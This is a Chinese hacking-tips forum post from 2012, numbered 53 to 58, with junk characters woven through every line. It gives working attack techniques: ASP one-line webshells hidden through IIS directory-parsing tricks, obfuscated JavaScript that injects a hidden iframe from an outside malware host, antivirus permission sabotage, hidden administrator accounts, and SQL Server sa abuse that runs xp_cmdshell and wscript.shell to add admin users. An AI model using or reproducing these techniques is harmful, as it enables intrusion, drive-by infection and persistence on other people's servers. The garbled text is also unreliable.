, F7 ^8 L0 R2 s. r6 M6 k0 i, J& M; d; m" R. ?( x8 u- E! {
53、隐藏ASP后门的两种方法# B7 f1 G: p' E& R
1、建立非标准目录:mkdir images..\! y0 G" n$ f9 I( T5 R/ w
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
?' K; W L; T3 p. u$ ]通过web访问ASP木马:http://ip/images../news.asp?action=login
7 f! K* s& r9 h: b1 S& {1 `如何删除非标准目录:rmdir images..\ /s- f0 x/ D4 X' ?: [* O8 n. o5 z/ h
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
' E6 t; K. ?! i& d3 A) \mkdir programme.asp2 L' W2 ]0 w j9 A
新建1.txt文件内容:<!--#include file=”12.jpg”-->! m/ o( F5 J% t( N; t
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
/ I6 u1 I+ ~% t, p7 _attrib +H +S programme.asp
& p6 J, O6 R6 w$ q3 R5 D通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
2 f+ \ Y! o0 p5 Z
" m3 g* e5 A7 A0 {54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
7 R3 v# M. z% B然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。, l! w$ O8 L/ K: O: G
9 `+ \$ B6 W$ W' I& F3 Q; N
55、JS隐蔽挂马2 t$ e4 l1 n7 C: f; `
1.
( b, n& _$ Y S: j/ Avar tr4c3="<iframe src=ht";; M! M/ |2 c$ F6 L* X
tr4c3 = tr4c3+"tp:/";1 Z& `# q) n- a4 d3 [: G
tr4c3 = tr4c3+"/ww";# k" Q9 [: S+ z+ h# M5 d
tr4c3 = tr4c3+"w.tr4";. Z: S6 B& k. I% q( B/ l
tr4c3 = tr4c3+"c3.com/inc/m";7 M3 M, l2 U! `2 E$ M( R
tr4c3 = tr4c3+"m.htm style="display:none"></i";8 K. _0 Z- M% w B4 H
tr4c3 =tr4c3+"frame>'";) N; c: j4 R, p6 s3 F; L: ] l( h7 j
document.write(tr4c3);# V! r7 B8 w! V+ C
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
# `2 E) Z8 o2 x3 R0 x7 N& d1 L7 V" ~1 _$ d. c
2.
$ H7 J1 l4 t; p$ P9 Q7 y/ P# Q; p转换进制,然后用EVAL执行。如5 }' X! b0 U6 [) m* {6 K
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");9 B P1 s* K9 N# y+ Y+ g
不过这个有点显眼。
& ^3 K" f3 j8 p% Q& E8 J3.9 P0 w4 h5 o+ P+ x' D: E
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
: k& G( I8 \8 S5 l% W7 v9 o) H最后一点,别忘了把文件的时间也修改下。5 }, T0 M- p) v
0 Q# n7 M: ^. n3 l" n# Q0 C, `
56.3389终端入侵常用DOS命令! M. o1 m, R3 n& \+ z5 r
taskkill taskkill /PID 1248 /t
9 L# r$ [4 u) ` a$ a6 t7 W9 k/ z5 M) c! o3 v, l
tasklist 查进程
! G0 I# d) g3 l0 I
! A, R6 z/ ^% B" p# {cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
- S# [/ F/ P: T u; d; G+ u4 Y; uiisreset /reboot' {2 b, p0 h- Q5 _$ `3 J$ p4 b$ B/ `
tsshutdn /reboot /delay:1 重起服务器# D2 |/ A& Q6 F2 b4 q- Z
( W2 Y5 P N* Z) n, J% y
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
' b* m/ w% J1 u+ K& q
& Y9 i# f! Z B8 `0 Hquery user 查看当前终端用户在线情况
; @( A1 I {: X$ v6 N% `/ `+ y
0 i6 I* ]" h5 i2 Y要显示有关所有会话使用的进程的信息,请键入:query process *
4 L) F5 I4 P/ r* ~
# k! ^' C/ L$ e: u: Z$ C要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:24 l* e$ \2 h' i5 R% }) e
3 M8 h- h( Y! |: V8 h$ v要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
5 I+ s! R2 A) L1 A" u* t5 c% ?+ x4 G) X0 i8 E W4 y
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM022 J: D% q% c2 \( @
( d5 H" [ m9 y3 f! V
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
2 e1 d& |0 x' P8 J% N) j! B7 g
$ ^6 A4 \% E$ ^% C0 ~" q6 v命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
. L6 q6 g: b2 ]9 G$ Y; \. D& I' N. U7 A8 u- w {
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
' R3 Z9 D" O% k l, J# D6 k/ V, Z" y3 N* l/ X$ _3 x, B
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机6 U, `: t5 e1 I, y
6 F, o& S3 E: ^3 y
56、在地址栏或按Ctrl+O,输入:( Z: ~" \) p$ ~3 M8 d) `
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;% x4 k0 q1 e2 D( G T
3 q$ l: }: ]3 R: d. e
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
# g ?5 C- r/ b" u# F: @% d2 j/ R; z/ T4 U- {- J
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
4 \' G% i: [! p' ^, X用net localgroup administrators是可以看到管理组下,加了$的用户的。
) m7 z+ d8 F+ x/ v
5 R! ^6 v) ~& ]. n, k58、 sa弱口令相关命令2 f- G, K' q: L- y
/ T/ c4 m3 J6 }. _ N一.更改sa口令方法:
8 p7 {' y T" ?8 i% ?9 L9 e用sql综合利用工具连接后,执行命令:
6 |& l- R+ V+ O! V: `% Y+ sexec sp_password NULL,'20001001','sa'
" d% z: g+ ?+ B(提示:慎用!)7 \2 C/ G) L' F$ r8 E- f1 Z
9 u1 g- c4 M4 J- k& w9 l% n+ h9 q) P二.简单修补sa弱口令.
3 H- l# e |. W( p! z0 r6 z/ q6 R2 Y. Q W
方法1:查询分离器连接后执行:
/ d5 D" Q& t6 G+ t7 U; aif exists (select * from B; G0 w' p: Z9 M1 r
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and* | @( X5 ^4 }+ k6 w
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)9 [9 H% q/ f$ E3 t
! d7 Z6 |7 L: m8 [- }5 k
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
8 e$ g- P2 W, S& {4 Y! H
% |- F; @( G; l3 \1 }GO6 _) ?, M) }% V
4 d3 n! ]4 ~9 ]. X* Q/ v2 f
然后按F5键命令执行完毕4 f* `* ~, t* k6 X
p! Y* L5 Z# \% E" V
方法2:查询分离器连接后- U+ J& q% ~4 }* t' P6 p7 d% E
第一步执行:use master+ b+ }/ T. `1 L a
第二步执行:sp_dropextendedproc 'xp_cmdshell'
6 O! L* b! k4 X* W! C然后按F5键命令执行完毕
5 A j& Z6 |. i4 a# c& T/ i4 ~6 [( {0 p
2 j$ G* g+ l2 u. _/ W; @8 p
三.常见情况恢复执行xp_cmdshell.
) d. L3 x1 F9 O! M" e
0 j" U7 M2 }1 X$ h. Y1 y X3 h9 _0 L8 A! M+ ?$ G8 b
1 未能找到存储过程'master..xpcmdshell'.( i3 m7 _* T7 ^* n/ P3 W
恢复方法:查询分离器连接后,% R, H9 A; r; h4 S# m' W7 k% e
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int9 S; J& J8 J0 f3 Z; c$ P$ J
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'- h" P8 D4 l/ y% b; K' E7 ]
然后按F5键命令执行完毕
3 Q, l- Q0 w% I) X+ q
1 S/ u. \6 U( O) @2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)# h# l. v% @- \' O M% U
恢复方法:查询分离器连接后,
* L/ Y( h0 {5 Y7 |; K3 g' Y1 ]" u: i第一步执行:sp_dropextendedproc "xp_cmdshell"
0 n) G9 t4 `3 L2 ?0 U: F2 J第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' \7 f) ~& {/ Z7 x, G+ X' ~& }, w然后按F5键命令执行完毕7 L2 Z) X7 i4 E" }
1 {7 a8 o$ ^2 H+ T4 D( }2 T3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
7 v6 T- V( H& \1 G6 X恢复方法:查询分离器连接后,
( O I: w) f( u+ f& y第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
) J1 R r$ g* E2 L7 G5 ] |第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ; \7 q L! |6 e& m
然后按F5键命令执行完毕: K( S8 ]* s4 h2 }9 A+ i
4 s3 y; B* o& b# b, L四.终极方法.3 H6 q( s7 }* p% V
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:3 @1 U5 f+ K5 a0 X8 F
查询分离器连接后,$ {9 g# e1 ^5 P( A
2000servser系统:
& y* x" v9 e' a, L- ` N1 t2 s6 Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add': d0 {7 H6 z' x. B8 b
, L0 ^% D% h4 q, qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
, R# i! T* l5 v7 v7 H
1 }9 c5 U9 U8 w1 G8 v7 Y& Dxp或2003server系统:8 c! J6 N' M) q* M' P8 H, W9 I
5 F3 J' d: u( K* Kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'! @0 C/ a0 B/ W; k$ d& L
0 ^/ y0 F6 v8 @6 W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
2 H+ u) R4 z3 \0 o, A5 v- e |
发表于 2012-9-15 14:13:15
收藏
支持
反对